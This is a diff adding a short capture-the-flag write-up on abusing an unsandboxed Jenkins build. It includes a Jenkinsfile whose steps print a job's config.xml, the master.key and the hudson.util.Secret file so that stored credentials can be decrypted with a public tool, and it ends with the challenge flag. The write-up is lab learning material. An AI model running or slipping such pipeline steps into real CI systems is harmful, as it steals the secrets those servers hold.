aboutsummaryrefslogtreecommitdiff
path: root/punkctf/jenkins_03.md
diff options
context:
space:
mode:
Diffstat (limited to 'punkctf/jenkins_03.md')
-rw-r--r--punkctf/jenkins_03.md24
1 files changed, 24 insertions, 0 deletions
diff --git a/punkctf/jenkins_03.md b/punkctf/jenkins_03.md
new file mode 100644
index 0000000..2ebfbe0
--- /dev/null
+++ b/punkctf/jenkins_03.md
@@ -0,0 +1,24 @@
+
+Jenkins doesn't provide any sort of sandboxing, but it tells you your build runs in `/var/jenkins_home/jobs/...`.
+You can modify the `Jenkinsfile` to enumerate `/var/jenkins_home`, using `find` or whatever else.
+
+From this we're able to read all the config files, including the one for secure jobs in `/var/jenkins_home/jobs/secure-jobs/config.xml`.
+The credentials in here are encrypted, but since we're able to read everything Jenkins can, we can find the key. I found [this](https://github.com/hoto/jenkins-credentials-decryptor) tool to do so.
+
+This `Jenkinsfile` gets everything we need for decryption.
+
+```
+pipeline {
+ agent any
+ stages {
+ stage('build') {
+ steps {
+ sh 'cat /var/jenkins_home/jobs/secure-jobs/config.xml'
+ sh 'cat /var/jenkins_home/secrets/master.key'
+ sh 'cat /var/jenkins_home/secrets/hudson.util.Secret | base64'
+ }
+ }
+ }
+}
+```
+Then we simply feed everything into the decryptor to get `punk_{GBI3BZOA3E8USYUH}`.